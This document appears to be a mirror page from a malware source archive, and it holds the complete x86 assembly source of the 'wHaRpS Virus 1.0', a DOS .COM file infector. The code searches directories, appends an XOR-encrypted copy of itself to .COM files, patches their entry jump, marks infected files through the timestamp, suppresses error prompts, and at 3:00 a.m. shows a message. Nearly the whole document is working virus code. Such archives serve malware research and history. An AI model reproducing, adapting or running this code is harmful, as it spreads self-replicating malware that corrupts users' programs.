mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-23 02:28:54 +00:00
337 lines
10 KiB
NASM
337 lines
10 KiB
NASM
|
; "One must crawl before one walks."
|
|||
|
; wHaRpS Virus 1.0
|
|||
|
; wHaRpS virus of independent virus writer FirstStrike
|
|||
|
; For use by [Phalcon\Skism] ONLY!
|
|||
|
; Special thanx to:
|
|||
|
; Gheap
|
|||
|
; Dark Angel
|
|||
|
; Demogorgon
|
|||
|
|
|||
|
|
|||
|
name wHaRpS
|
|||
|
title
|
|||
|
code segment
|
|||
|
assume cs:code,ds:code
|
|||
|
org 100h
|
|||
|
|
|||
|
|
|||
|
dta equ 65000d ; DTA address to be set
|
|||
|
fname equ 65000d + 1eh ; DTA - file name
|
|||
|
ftime equ 65000d + 16h ; DTA - file time
|
|||
|
fsize equ 65000d + 1ah ; DTA - file size
|
|||
|
orgdir equ 65400d ; original path storage
|
|||
|
date equ 65300d ; store file date
|
|||
|
time equ 65302d ; store file time
|
|||
|
attrib equ 65304d ; store file attrib
|
|||
|
err1 equ 65306d ; old error handler address
|
|||
|
err2 equ 65308d ; old error handler address
|
|||
|
|
|||
|
olddta equ 80h ; original DTA address
|
|||
|
|
|||
|
|
|||
|
|
|||
|
begin:
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
call setup ; find "delta offset"
|
|||
|
setup:
|
|||
|
pop bp
|
|||
|
sub bp, offset setup
|
|||
|
jmp main ; DEBUG E8 02 00
|
|||
|
nop
|
|||
|
jmp main
|
|||
|
|
|||
|
crypt_em:
|
|||
|
xor di,di
|
|||
|
lea si, [bp+main]
|
|||
|
mov di, si
|
|||
|
mov cx, end_crypt - main
|
|||
|
|
|||
|
xor_loop:
|
|||
|
lodsb ; ds:[si] -> al
|
|||
|
db 34h ; xor al, XX
|
|||
|
encrypt_val db 0 ; Starting encryption value is 0
|
|||
|
stosb ; al ->es:[di]
|
|||
|
loop xor_loop
|
|||
|
ret
|
|||
|
|
|||
|
main:
|
|||
|
xor di,di
|
|||
|
mov di,0100h ; Restore first three
|
|||
|
lea si,[bp+saveins] ; original program bytes
|
|||
|
mov cx,0003d
|
|||
|
rep movsb
|
|||
|
jmp system_pic ; Take a "picture" of system settings
|
|||
|
|
|||
|
handler: ; error handler
|
|||
|
mov al,0
|
|||
|
iret
|
|||
|
endp
|
|||
|
|
|||
|
|
|||
|
data label byte
|
|||
|
wharps db '[wHaRpS]',0 ; wHaRpS ID
|
|||
|
author db 'F<>rs<72>Str<74>k<EFBFBD>',0 ; Me
|
|||
|
dir_mask db '*.',0 ; dir atrib
|
|||
|
allcom db '*.COM',0 ; what to search for
|
|||
|
root db '\',0 ; root
|
|||
|
saveins db 0e8h,00h,00h ; original three bytes
|
|||
|
ultimate dw 0 ; ultimate dir to be reached
|
|||
|
current dw 0 ; current dir
|
|||
|
message db 'wHaRpS! It is 3:00 a.m. > ETERNAL $'
|
|||
|
|
|||
|
system_pic: ; SNAP!
|
|||
|
mov ah,47h ; get original path
|
|||
|
mov dl,0
|
|||
|
lea si,cs:orgdir ; store original path
|
|||
|
int 21h
|
|||
|
|
|||
|
crypt_change: ; set crypt value
|
|||
|
mov ah,2ch
|
|||
|
int 21h
|
|||
|
mov [bp+encrypt_val],dl
|
|||
|
cmp ch,03
|
|||
|
jz more
|
|||
|
jmp errorh
|
|||
|
|
|||
|
more:
|
|||
|
cmp cl,00
|
|||
|
jz bomb
|
|||
|
jmp errorh
|
|||
|
|
|||
|
bomb:
|
|||
|
mov ah,09h
|
|||
|
lea dx,[bp+message]
|
|||
|
int 21h
|
|||
|
mov ah,4ch
|
|||
|
int 21h
|
|||
|
|
|||
|
errorh:
|
|||
|
push es ; save original error handler address
|
|||
|
mov ax,3524h
|
|||
|
int 21h
|
|||
|
mov word ptr cs:err1,bx
|
|||
|
mov word ptr cs:err2,es
|
|||
|
pop es
|
|||
|
|
|||
|
mov ax,2524h ; set an error handler
|
|||
|
lea dx, [bp+offset handler] ; no more Retry,Abort,Fail deals
|
|||
|
int 21h
|
|||
|
jmp pre_search
|
|||
|
|
|||
|
drop_to_root: ; subroutine to visit the root
|
|||
|
lea dx,[bp+root]
|
|||
|
jmp continue
|
|||
|
|
|||
|
set_path: ; OR set a path
|
|||
|
lea dx,cs:fname
|
|||
|
|
|||
|
continue:
|
|||
|
mov ah,3bh
|
|||
|
int 21h
|
|||
|
ret
|
|||
|
|
|||
|
return_to_search:
|
|||
|
inc [bp+ultimate]
|
|||
|
call drop_to_root
|
|||
|
mov [bp+current],0000
|
|||
|
jmp find_first_dir
|
|||
|
|
|||
|
|
|||
|
pre_search: ; set a DTA
|
|||
|
mov dx,dta
|
|||
|
mov ah,1ah
|
|||
|
int 21h
|
|||
|
|
|||
|
mov [bp+current],0000 ; zero the counters
|
|||
|
mov [bp+ultimate],0000 ; ""
|
|||
|
inc [bp+ultimate] ; want to search 1st dir in root
|
|||
|
call drop_to_root ; bomb to root
|
|||
|
|
|||
|
find_first_dir: ; directory searchin'
|
|||
|
lea dx,[bp+dir_mask]
|
|||
|
mov cx,16
|
|||
|
mov ah,4Eh
|
|||
|
int 21h
|
|||
|
jc almost_done ; no directories?
|
|||
|
|
|||
|
dir_test:
|
|||
|
inc [bp+current] ; directory found - MARK!
|
|||
|
mov bx,[bp+current]
|
|||
|
cmp word ptr [bp+ultimate],bx ; is it the one we want?
|
|||
|
jnz find_next_dir ; no, find another
|
|||
|
call set_path ; yes, set the correct path
|
|||
|
jmp find_first_file ; find some .COMs
|
|||
|
|
|||
|
|
|||
|
|
|||
|
find_next_dir: ; mo' directory searchin'
|
|||
|
mov ah,4fh
|
|||
|
int 21h
|
|||
|
jc almost_done
|
|||
|
jmp dir_test ; go see if correct dir found yet
|
|||
|
|
|||
|
|
|||
|
|
|||
|
find_first_file: ; file searchin'
|
|||
|
lea dx,[bp+allcom]
|
|||
|
mov cx,00000001b
|
|||
|
mov ah,4Eh
|
|||
|
int 21h
|
|||
|
jc return_to_search ; no .COM so mo' dir
|
|||
|
jmp check_if_ill ; is the file "sick"?
|
|||
|
|
|||
|
|
|||
|
|
|||
|
find_next_file: ; keep on a searchin'
|
|||
|
mov ah,4fh
|
|||
|
int 21h
|
|||
|
jc return_to_search ; no more .COM so back
|
|||
|
; to the directories
|
|||
|
|
|||
|
check_if_ill: ; check file's health
|
|||
|
mov ax,cs:ftime
|
|||
|
and al,11111b ; good, your sick!
|
|||
|
cmp al,62d/2 ; (No more 62 seconds as virus
|
|||
|
jz find_next_file ; markers! - I swear!)
|
|||
|
|
|||
|
cmp cs:fsize,60000d ; whoa, file to big!
|
|||
|
ja find_next_file ; so, get a new one
|
|||
|
|
|||
|
cmp cs:fsize,500d ; whoa, file to small!
|
|||
|
jb find_next_file ; throw it back and move on
|
|||
|
jmp infect ; perfect, for infection
|
|||
|
|
|||
|
db 'Joy J.',0 ; don't ask
|
|||
|
|
|||
|
error:
|
|||
|
pre_done:
|
|||
|
almost_done:
|
|||
|
jmp done ; in case of emergency.....
|
|||
|
|
|||
|
infect:
|
|||
|
mov ah,43h ; save original attribute
|
|||
|
mov al,00h
|
|||
|
lea dx,cs:[fname]
|
|||
|
int 21h
|
|||
|
mov cs:attrib,cx
|
|||
|
jc pre_done
|
|||
|
|
|||
|
mov ax,4301h ; clear all attributes
|
|||
|
and cx,11111110b ; (none shall slow progress)
|
|||
|
int 21h
|
|||
|
jc pre_done
|
|||
|
|
|||
|
|
|||
|
mov ax,3d02h ; open the file, please
|
|||
|
int 21h
|
|||
|
jc pre_done
|
|||
|
xchg bx,ax
|
|||
|
|
|||
|
|
|||
|
|
|||
|
mov ax,5700h ; save the date/time
|
|||
|
int 21h
|
|||
|
mov cs:time,cx
|
|||
|
mov cs:date,dx
|
|||
|
jc pre_done
|
|||
|
|
|||
|
|
|||
|
mov ah,3Fh ; read first 3 bytes of file
|
|||
|
mov cx,0003h ; to be infected and save
|
|||
|
lea dx,[bp+saveins]
|
|||
|
int 21h
|
|||
|
jc pre_done
|
|||
|
|
|||
|
mov ax,4202h ; move to end of file
|
|||
|
xor cx,cx
|
|||
|
xor dx,dx
|
|||
|
int 21h
|
|||
|
jc pre_done
|
|||
|
mov [bp+new_jmp],ax
|
|||
|
|
|||
|
call crypt_em
|
|||
|
|
|||
|
end_crypt label byte ; encrypt to here
|
|||
|
|
|||
|
mov ah,40h
|
|||
|
mov cx,endcode-begin
|
|||
|
lea dx,[bp+begin]
|
|||
|
int 21h ; encrypt n' write virus to end of
|
|||
|
jc done ; file
|
|||
|
|
|||
|
mov ax,4200h ; go to beginning of file
|
|||
|
xor cx,cx
|
|||
|
xor dx,dx
|
|||
|
int 21h
|
|||
|
jc done
|
|||
|
jmp cont
|
|||
|
|
|||
|
jmpc db 0e9h
|
|||
|
new_jmp dw ?
|
|||
|
|
|||
|
cont:
|
|||
|
mov ah,40h
|
|||
|
mov cl,3
|
|||
|
lea dx,[bp+jmpc]
|
|||
|
int 21h
|
|||
|
jc done
|
|||
|
|
|||
|
attrib_stuff:
|
|||
|
|
|||
|
mov ax,5701h
|
|||
|
mov cx,cs:[time]
|
|||
|
mov dx,cs:[date]
|
|||
|
or cl,11111b
|
|||
|
int 21h
|
|||
|
jc done
|
|||
|
|
|||
|
mov ah,3eh
|
|||
|
int 21h
|
|||
|
jc done
|
|||
|
|
|||
|
mov ax,4301h
|
|||
|
mov cx,cs:[attrib]
|
|||
|
lea dx,cs:[fname]
|
|||
|
int 21h
|
|||
|
jc done
|
|||
|
|
|||
|
done:
|
|||
|
mov dx,olddta ; restore all changes
|
|||
|
mov ah,1ah
|
|||
|
int 21h
|
|||
|
|
|||
|
push ds
|
|||
|
mov ax,2524h
|
|||
|
lea dx,cs:[err2]
|
|||
|
mov ds,dx
|
|||
|
lea dx,cs:[err1]
|
|||
|
int 21h
|
|||
|
pop ds
|
|||
|
|
|||
|
mov ah,3bh
|
|||
|
mov dx,'/'
|
|||
|
int 21h
|
|||
|
|
|||
|
mov ah,3bh
|
|||
|
lea dx,cs:[orgdir]
|
|||
|
int 21h
|
|||
|
|
|||
|
xor di,di
|
|||
|
mov di,0100h
|
|||
|
jmp di ; good_bye
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
endcode label byte
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
code ends
|
|||
|
end begin
|
|||
|
|
|||
|
|